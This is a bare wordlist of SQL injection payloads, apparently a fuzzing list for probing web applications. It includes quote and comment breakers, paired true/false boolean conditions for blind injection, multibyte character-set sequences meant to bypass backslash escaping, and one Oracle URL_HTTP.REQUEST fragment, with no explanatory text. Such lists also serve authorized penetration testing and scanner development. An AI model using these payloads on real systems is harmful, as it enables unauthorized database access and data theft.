'
''
'
'--
'
'#
'
'||'
'
'*'
'
'-'
'
'^'
'
'&'
'
\'
'
','
'
'.'
'
' OR '
'
' OR ''-'
'
' OR '' '
'
' OR ''&'
'
' OR ''^'
'
' OR ''*'
'
'/*
'
%'
'
'%00
'
'=' 'or' AND '=' 'or'
'
' --
'
' #
\
'#
\
'-- -
\
' OR '
\
\\
\
\\'#
\
\\'-- -'
1%bf%5c'
1%bf%5c''
1%bf%5c'
1%bf%5c'-- -
1%bf%5c'
1%bf%5c'#
1%af%5c'
1%af%5c''
1%af%5c'
1%af%5c'-- -
1%af%5c'
1%af%5c'#
1%af%5c'
1%af%5c'%00
0xbf27
0xbf27'
縗'
縗' OR '
縗'
縗'-- -
縗'
縗'#
圭'
圭''
圭'
圭'#
圭'
圭'-- -
0x8c5c
0x8c5c'
\xa3\x27
\xa3\x27\x27
\xa3\x27
\xa3\x27-- -
\xa3\x27
\xa3\x27#
0xbf5c27
0xbf5c27c27
0xbf5c27
0xbf5c27-- -
0xbf5c27
0xbf5c27#
0xbf5c27
0xbf5c27%00
ï»¿'
ï»¿''
ï»¿\'
ï»¿\'-- -
ï»¿\'
ï»¿\'#
ï»¿\
ï»¿
ï»¿\'
ï»¿\' OR '
*
*|
*
*/*
/
//*
'
';
'
';-- -
'
';%00
'
', select 1-- -
'
','
'
',@variable
'
'||'URL_HTTP.REQUEST
 AND 1=1
 AND 2=1
 AND 1=1--
 AND 2=1--
 AND 1=1#
 AND 2=1#
 AND 1=1/*
 AND 2=1/*
'
'-- -
'
' #
'
'/*
'  AND '1'='1
'  AND '2'='1
'  AND '1'='1'--
'  AND '2'='1'--
'  AND '1'='1'#
'  AND '2'='1'#
'  AND '1'='1'/*
'  AND '2'='1'/*
' AND 1=1  AND ''='
' AND 2=1  AND ''='
'  AND 1=1
'  AND 2=1
'  AND 1=1--
'  AND 2=1--
'  AND 1=1#
'  AND 2=1#
'  AND 1=1/*
'  AND 2=1/*
')  AND ('1'='1
')  AND ('2'='1
')  AND ('1'='1'--
')  AND ('2'='1'--
')  AND ('1'='1'#
')  AND ('2'='1'#
')  AND ('1'='1'/*
')  AND ('2'='1'/*
')  AND '1'='1
')  AND '2'='1
')  AND '1'='1'--
')  AND '2'='1'--
')  AND '1'='1'#
')  AND '2'='1'#
')  AND '1'='1'/*
')  AND '2'='1'/*
"
"-- -
"
" #
"
"/*
"  AND "1"="1
"  AND "2"="1
"  AND "1"="1"--
"  AND "2"="1"--
"  AND "1"="1"#
"  AND "2"="1"#
"  AND "1"="1"/*
"  AND "2"="1"/*
" AND 1=1  AND ""="
" AND 2=1  AND ""="
"  AND 1=1
"  AND 2=1
"  AND 1=1--
"  AND 2=1--
"  AND 1=1#
"  AND 2=1#
"  AND 1=1/*
"  AND 2=1/*
")  AND ("1"="1
")  AND ("2"="1
")  AND ("1"="1"--
")  AND ("2"="1"--
")  AND ("1"="1"#
")  AND ("2"="1"#
")  AND ("1"="1"/*
")  AND ("2"="1"/*
")  AND "1"="1
")  AND "2"="1
")  AND "1"="1"--
")  AND "2"="1"--
")  AND "1"="1"#
")  AND "2"="1"#
")  AND "1"="1"/*
")  AND "2"="1"/*